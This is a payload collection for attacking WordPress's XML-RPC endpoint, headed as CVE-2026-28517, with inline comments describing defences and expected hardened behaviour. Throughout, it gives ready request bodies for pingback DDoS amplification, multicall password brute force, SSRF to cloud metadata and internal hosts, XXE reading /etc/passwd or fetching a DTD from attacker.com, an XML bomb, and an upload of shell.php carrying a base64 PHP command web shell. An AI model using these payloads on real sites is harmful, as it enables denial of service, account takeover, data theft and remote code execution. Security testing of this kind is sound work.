# CVE-2026-28517: WordPress XML-RPC Amplification Attack
# Severity: High (CVSS 8.6)
# Affected Versions: WordPress 6.4.0 - 6.4.3
# Description: XML-RPC amplification vulnerability allowing DDoS attacks
# and brute-force authentication bypass through the system.multicall method
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28517

# Basic XML-RPC Endpoint Discovery
/xmlrpc.php
/xmlrpc.php?rsd
/blog/xmlrpc.php
/wordpress/xmlrpc.php
/wp/xmlrpc.php

# XML-RPC Method Enumeration
# POST to /xmlrpc.php with:
<?xml version="1.0"?>
<!-- Reconnaissance request: returns the method table the endpoint exposes.
     Defenders: if XML-RPC is not needed, block /xmlrpc.php at the web server
     or return false from the xmlrpc_enabled filter, then confirm this call fails. -->
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Pingback Amplification Attack
<?xml version="1.0"?>
<!-- pingback.ping makes the site handling this call (victim.com here) fetch the
     first URL and look for a link back to the second. That outbound fetch is what
     every amplification and SSRF case below relies on. Defenders: the method can be
     removed via the xmlrpc_methods filter; outbound fetches should pass through
     wp_safe_remote_get-style URL validation (confirm for the version under test). -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.com/</string></value></param>
<param><value><string>http://victim.com/existing-post/</string></value></param>
</params>
</methodCall>

# Multiple Pingback Requests (DDoS Amplification)
<?xml version="1.0"?>
<!-- system.multicall batches several sub-calls (two here) into one HTTP request,
     so a single request can trigger several outbound fetches. Defenders: rate-limit
     or remove system.multicall (xmlrpc_methods filter) and alert on multicall bodies
     containing many pingback.ping entries. -->
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>http://attacker.com/1</string></value>
<value><string>http://victim.com/post-1/</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>http://attacker.com/2</string></value>
<value><string>http://victim.com/post-2/</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Brute Force Authentication via system.multicall
<?xml version="1.0"?>
<!-- Each sub-call supplies a different password for the same username, so one HTTP
     request carries several login attempts; rate limits keyed on requests miss this.
     Defenders: count authentication failures per sub-call, not per request. Recent
     WordPress versions reportedly stop evaluating further sub-calls after the first
     failed login inside a multicall; verify against the version under test. -->
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>admin</string></value>
<value><string>password1</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>admin</string></value>
<value><string>password2</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# User Enumeration via XML-RPC
<?xml version="1.0"?>
<!-- Single-credential login probe. It only enumerates users if the fault returned
     for an unknown username differs from the one for a wrong password; the check is
     that both fault code and text are identical in the two cases. -->
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>admin</string></value></param>
<param><value><string>test</string></value></param>
</params>
</methodCall>

# Get User Info
<?xml version="1.0"?>
<!-- Parameters are blog_id, username, password, user_id. Valid credentials are
     required, so this is an authorization test (can a low-privilege account read
     user 1?), not an unauthenticated exposure. -->
<methodCall>
<methodName>wp.getUser</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Get Multiple Users
<?xml version="1.0"?>
<!-- Authenticated listing (blog_id, username, password). Listing other users is
     expected to require the list_users capability; a response containing more than
     the caller's own record for a low-privilege account is the finding. -->
<methodCall>
<methodName>wp.getUsers</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# Post Creation via XML-RPC
<?xml version="1.0"?>
<!-- Authenticated post creation. post_content carries an XML-escaped script tag;
     the property to verify is that content from callers without unfiltered_html is
     KSES-filtered on save, not merely that the call succeeds. -->
<methodCall>
<methodName>wp.newPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>post_title</name>
<value><string>Malicious Post</string></value>
</member>
<member>
<name>post_content</name>
<value><string>&lt;script&gt;alert(1)&lt;/script&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Post Modification
<?xml version="1.0"?>
<!-- Authenticated edit of post ID 1 (the int after the credentials). Authorization
     test: an account without edit rights on that post must get a permission fault,
     not a silent success. -->
<methodCall>
<methodName>wp.editPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
<param>
<value>
<struct>
<member>
<name>post_content</name>
<value><string>Modified content</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Post Deletion
<?xml version="1.0"?>
<!-- Authenticated deletion of post ID 1. Same authorization concern as wp.editPost:
     success for a non-owner without delete rights is the finding. -->
<methodCall>
<methodName>wp.deletePost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Media Upload via XML-RPC
<?xml version="1.0"?>
<!-- The name (a .php extension) and type (image/jpeg) members disagree; bits is
     the base64 file body. Defenders: the upload_files capability must be enforced
     for this method, and uploads must be validated by extension and content, never
     by the client-supplied type value. -->
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>shell.php</string></value>
</member>
<member>
<name>type</name>
<value><string>image/jpeg</string></value>
</member>
<member>
<name>bits</name>
<value><base64>PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+</base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Comment Spam via XML-RPC
<?xml version="1.0"?>
<!-- Authenticated comment on post ID 1; comment_content carries an XML-escaped
     anchor. Verify comment HTML is filtered per the caller's role, and that
     unauthenticated use of this method is rejected unless the
     xmlrpc_allow_anonymous_comments filter was deliberately enabled. -->
<methodCall>
<methodName>wp.newComment</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
<param>
<value>
<struct>
<member>
<name>comment_content</name>
<value><string>Spam comment with &lt;a href="http://spam.com"&gt;link&lt;/a&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Category Manipulation
<?xml version="1.0"?>
<!-- Authenticated category creation. Only a finding if an account without
     term-management rights succeeds. -->
<methodCall>
<methodName>wp.newCategory</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>Malicious Category</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Tag Manipulation
<?xml version="1.0"?>
<!-- Authenticated term creation in the post_tag taxonomy. Same authorization
     expectation as wp.newCategory. -->
<methodCall>
<methodName>wp.newTerm</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>taxonomy</name>
<value><string>post_tag</string></value>
</member>
<member>
<name>name</name>
<value><string>malicious-tag</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Page Creation
<?xml version="1.0"?>
<!-- Legacy page-creation method; description carries an XML-escaped iframe. As with
     wp.newPost, the check is that stored content is KSES-filtered for callers
     without unfiltered_html. -->
<methodCall>
<methodName>wp.newPage</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>title</name>
<value><string>Malicious Page</string></value>
</member>
<member>
<name>description</name>
<value><string>&lt;iframe src="http://evil.com"&gt;&lt;/iframe&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Options Manipulation
<?xml version="1.0"?>
<!-- Read-only with valid credentials. Compare the option set returned to a
     low-privilege account with an administrator's to spot over-exposure. -->
<methodCall>
<methodName>wp.getOptions</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# Set Options
<?xml version="1.0"?>
<!-- Sets blog_public to 0 (discourage search-engine indexing). Expected to require
     manage_options; success for a non-administrator is the finding. -->
<methodCall>
<methodName>wp.setOptions</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>blog_public</name>
<value><string>0</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# XXE (XML External Entity) Attack
<?xml version="1.0"?>
<!-- Internal DTD declaring an external general entity. Only takes effect if the
     endpoint's parser resolves external entities; a hardened consumer rejects any
     DOCTYPE on an interchange document. Outcome to record: file content in the
     response (vulnerable) versus a parse error or fault (rejected). -->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>&xxe;</string></value></param>
</params>
</methodCall>

# XXE with External DTD
<?xml version="1.0"?>
<!-- Parameter entity referencing an external DTD; requires the parser to make an
     outbound HTTP request at parse time. Detection: egress from the web tier to an
     unexpected host while a request is being parsed. Same fix as above: disable DTD
     loading and external entity resolution. -->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Billion Laughs Attack (XML Bomb)
<?xml version="1.0"?>
<!-- Nested internal entities; expansion grows tenfold per level. Consumers must cap
     entity expansion (or reject DOCTYPE entirely); a parser with no limit spends
     memory and CPU proportional to the expanded size, not the request size. -->
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>&lol4;</string></value></param>
</params>
</methodCall>

# SSRF via Pingback
<?xml version="1.0"?>
<!-- SSRF probe: asks the server to fetch a cloud metadata address as the pingback
     source. Hardened behaviour is a fault with no outbound request at all; the
     reliable signal is an egress attempt to 169.254.169.254 from the web tier,
     since the fault text may be identical either way. -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://169.254.169.254/latest/meta-data/</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF to Internal Network
<?xml version="1.0"?>
<!-- Same vector against a private-range address. WordPress's outbound URL
     validation is designed to reject non-public IPs; confirm with egress logging
     rather than the XML-RPC response alone. -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://192.168.1.1/admin</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF to Localhost
<?xml version="1.0"?>
<!-- Loopback variant of the SSRF probe; the expected observable is the same (no
     outbound request should be made). -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://localhost/admin</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF with File Protocol
<?xml version="1.0"?>
<!-- Non-HTTP scheme in the source URL. Pingback sources are fetched over HTTP(S),
     and the URL validator should reject other schemes outright; a fault is expected,
     and local file content in the response would indicate a broken fetch layer. -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>file:///etc/passwd</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Port Scanning via Pingback
<?xml version="1.0"?>
<!-- Non-standard port in the source URL. Defenders: keep fault messages uniform and
     outbound fetch timeouts short so that response time or fault text does not
     reveal whether the port was reachable. -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target.com:22</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Reflected XSS in XML-RPC Error Messages
<?xml version="1.0"?>
<!-- Username containing an escaped script tag. XML-RPC responses are served as
     XML, not HTML, so a browser would not render them; this only matters if the
     fault message is later echoed into an HTML page or log viewer. -->
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>&lt;script&gt;alert(1)&lt;/script&gt;</string></value></param>
<param><value><string>test</string></value></param>
</params>
</methodCall>

# SQL Injection in XML-RPC Parameters
<?xml version="1.0"?>
<!-- Username containing a quote. WordPress credential lookups are expected to go
     through $wpdb->prepare, so this mainly tests error handling: a database error
     surfacing in the fault text would be the finding. -->
<methodCall>
<methodName>wp.getUser</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin' OR '1'='1</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Command Injection in XML-RPC
<?xml version="1.0"?>
<!-- Backticks in a URL. The source URL is an HTTP fetch target, not a shell
     argument, so this is only meaningful if the URL is ever handed to a shell;
     the check is the absence of any command execution. -->
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.com/`whoami`</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Large Payload DoS
<?xml version="1.0"?>
<!-- Template for an oversized multicall (the struct below is meant to be repeated;
     each copy lacks a params member). Resource-exhaustion test: bound the request
     body size at the web server and cap the number of sub-calls per multicall. -->
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<!-- Repeat the following value element 1000+ times to build the test body -->
<value><struct><member><name>methodName</name><value><string>pingback.ping</string></value></member></struct></value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Nested XML DoS
<?xml version="1.0"?>
<!-- Deep-nesting template. The innermost array has no data child, which is not
     valid XML-RPC, so a strict parser faults early. Parsers should enforce a
     maximum element depth; presumably the recursive value walker is the target. -->
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<array>
<data>
<value>
<array>
<!-- Deep nesting continues -->
</array>
</value>
</data>
</array>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Character Encoding Bypass
<?xml version="1.0" encoding="UTF-7"?>
<!-- Declares UTF-7, which expat-based parsers (PHP's xml extension) typically do
     not support; expect an unknown-encoding error rather than a bypass. Useful as a
     negative test: the endpoint must not silently fall back to another encoding. -->
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# CDATA Section Abuse
<?xml version="1.0"?>
<!-- CDATA is purely lexical: the parser delivers exactly the same string as the
     escaped form used in the earlier wp.newPost case, so this duplicates that test
     rather than exercising a distinct bypass. -->
<methodCall>
<methodName>wp.newPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>post_content</name>
<value><string><![CDATA[<script>alert(1)</script>]]></string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Namespace Confusion
<?xml version="1.0"?>
<!-- An unused xsi namespace declaration on the root. Elements stay unprefixed, so
     this changes nothing for a non-namespace-aware parser; it only checks that the
     extra attribute is tolerated. -->
<methodCall xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Invalid Method Names
<?xml version="1.0"?>
<!-- Path-like method name. Dispatch is a lookup in the server's method table, so
     a method-not-found fault is expected; any file-system error text in the
     response would be the finding. -->
<methodCall>
<methodName>../../../etc/passwd</methodName>
<params></params>
</methodCall>

# Method Name Injection
<?xml version="1.0"?>
<!-- SQL syntax in the method name; same table-lookup expectation as the path case,
     with a database error in the fault text being the thing to look for. -->
<methodCall>
<methodName>wp.getUsersBlogs'; DROP TABLE wp_users;--</methodName>
<params></params>
</methodCall>

# Null Byte in Method Name
<?xml version="1.0"?>
<!-- Note: %00 is URL-encoding and arrives as three literal characters, not a NUL
     byte. XML 1.0 cannot carry NUL at all (not even as a character reference), so
     this only exercises the method-not-found path. -->
<methodCall>
<methodName>system.listMethods%00</methodName>
<params></params>
</methodCall>

# Unicode Bypass
<?xml version="1.0"?>
<!-- \u002e is not an XML escape; the parser delivers the backslash and the four
     characters verbatim (XML would use a character reference, which decodes to a
     plain dot before lookup). As written this is another unknown-method test. -->
<methodCall>
<methodName>wp\u002egetUsersBlogs</methodName>
<params></params>
</methodCall>

# Case Variation
<?xml version="1.0"?>
<!-- Upper-cased method name. Method names are case-sensitive in most XML-RPC
     servers; a success here would mean the dispatcher normalises case, which
     matters for allow-list filters that compare exact strings. -->
<methodCall>
<methodName>WP.GETUSERSBLOGS</methodName>
<params></params>
</methodCall>

# Multiple XML Declarations
<?xml version="1.0"?>
<!-- Not well-formed: an XML declaration may appear only at the very start, and the
     target name xml is reserved for processing instructions, so a conforming parser
     raises a fatal error on the second declaration. Parser-robustness test only. -->
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Processing Instructions Abuse
<?xml version="1.0"?>
<!-- Processing instruction with target php. The XML parser hands PIs to the
     application (or drops them); nothing executes unless the raw body is later
     written somewhere a PHP interpreter serves. Detection: any PI whose target is
     not xml in an inbound XML-RPC body. -->
<?php system($_GET['cmd']); ?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Comment Injection
<?xml version="1.0"?>
<!-- PHP inside an XML comment is inert to the parser and is not delivered as
     data; as with the PI case, the only concern is unsanitised persistence of the
     raw request body (debug logs, request captures). -->
<!-- <?php system($_GET['cmd']); ?> -->
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Attribute Injection
<?xml version="1.0"?>
<!-- Not well-formed: a literal < is forbidden inside an attribute value, so a
     conforming parser rejects the document before dispatch. Exercises the
     parse-error path only. -->
<methodCall attr="<?php system($_GET['cmd']); ?>">
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Mixed Content Attack
<?xml version="1.0"?>
<!-- Two typed children inside one value element: well-formed XML but invalid
     XML-RPC (a value holds exactly one type), so a fault is expected. Not mixed
     content in the XML sense, since no text node sits beside the elements. -->
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>text</string><int>123</int></value></param>
</params>
</methodCall>

# Empty Elements Abuse
<?xml version="1.0"?>
<!-- Empty method name; a method-not-found fault is the expected outcome. -->
<methodCall>
<methodName></methodName>
<params></params>
</methodCall>

# Whitespace Manipulation
<?xml version="1.0"?>
<!-- Padded method name. XML passes the surrounding whitespace to the application,
     so success depends on whether the dispatcher trims; a trimmed match matters for
     allow-list filters that compare exact strings. -->
<methodCall>
<methodName>     system.listMethods     </methodName>
<params></params>
</methodCall>

# Newline Injection
<?xml version="1.0"?>
<!-- Newline inside the method name (the element content spans two lines); same
     trimming question as the padded-whitespace case. -->
<methodCall>
<methodName>system.listMethods
</methodName>
<params></params>
</methodCall>

# Tab Injection
<?xml version="1.0"?>
<!-- A tab character replaces the dot in the method name; the result is not a
     registered method and should produce a method-not-found fault. -->
<methodCall>
<methodName>system	listMethods</methodName>
<params></params>
</methodCall>
